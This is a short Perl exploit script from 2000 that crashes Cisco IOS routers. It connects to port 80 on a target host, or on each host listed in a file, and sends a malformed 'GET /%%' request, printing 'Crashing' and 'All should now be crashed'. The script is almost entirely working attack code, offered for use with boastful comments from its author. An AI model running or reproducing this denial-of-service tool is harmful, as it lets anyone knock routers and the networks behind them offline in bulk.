#!/usr/bin/perl
##########################################################################
# Cisco IOS Router DOS attack via a specially formated web get request	 #
#												 #
# Coded by hypoclear of lUSt - (Linux Users Strike Today) on 5/23/00 	 #
#												 #
# Why did I make another exploit script for this vulnerability?		 #
#	Because I saw that it could be done in a few lines of PERL		 #
#	so why the heck not?!?  The whole thing could have been done in 	 #
#	about 10 - 15 lines of PERL, but I added things to make it cooler. #
#	Basically I wanted to show that certain things can be done in	 #
#	PERL much easier than in C.							 #
#												 #
# Shout out to vortexia at www.hack.co.za, who coded the original		 #
# exploit in C.										 #
# 												 #
# usage: ciscowebdos.pl -h <host> or ciscowebdos.pl -f <file>		 #
# NOTE: file can store multiple hosts seperated on different lines	 #
##########################################################################

use IO::Socket; use Getopt::Std;
getopts('f:h:');

sub use_file{my $host;
	print "Using file: $opt_f\n\n";
	open (HOSTLIST, "$opt_f") or die "can't open file: $!\n";
	while (<HOSTLIST>){crash_host($_);}
	close (HOSTLIST) or die "couldn't close file: $!\n"}

sub crash_host{
	print "Crashing: $_[0]\n";
        $remote = IO::Socket::INET->new(Proto=>"tcp",
                PeerAddr=>$_[0],
                PeerPort=>"http(80)",);
        unless ($remote){die "Can't Connect...Try to crash something else\n\n"};
        $remote->autoflush(1);
        print $remote "GET /\%\% HTTP/1.0\n\n";
        -close $remote;
        print "All should now be crashed...\n\n";}

print "\n\t\t\t***Lame props to myself***
\t\t\tCoded by hypoclear of lUSt 
\t\t\t(Linux Users Strike Today)\n\n";

if (defined $opt_f) {use_file();}
elsif (defined $opt_h) {crash_host($opt_h);}
else {print "Usage: ciscowebdos.pl -h <host> or ciscowebdos.pl -f <file>\n";}